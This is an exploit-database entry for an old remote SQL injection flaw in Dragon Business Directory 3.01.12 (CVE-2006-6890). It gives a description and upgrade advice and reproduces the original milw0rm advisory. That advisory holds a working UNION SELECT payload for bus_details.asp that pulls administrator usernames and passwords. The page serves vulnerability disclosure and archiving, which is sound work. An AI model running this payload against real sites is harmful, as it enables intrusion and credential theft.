header-logo
Suggest Exploit
vendor:
Dragon Business Directory
by:
ajann
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Dragon Business Directory
Affected Version From: 3.01.12
Affected Version To: 3.01.12
Patch Exists: YES
Related CWE: CVE-2006-6890
CPE: a:dragon_business_directory:dragon_business_directory:3.01.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Dragon Business Directory <= V3.01.12 (ID) Remote SQL Injection Vulnerability

Dragon Business Directory is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to version 3.01.13 or later.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Dragon Business Directory <= V3.01.12 (ID) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.enthrallweb.us
# $$      :  179.40  USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//bus_details.asp?ID=[SQL]

Example:

//bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin


[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# milw0rm.com [2006-12-23]

Navigation

Suggest Exploit

Services By CQR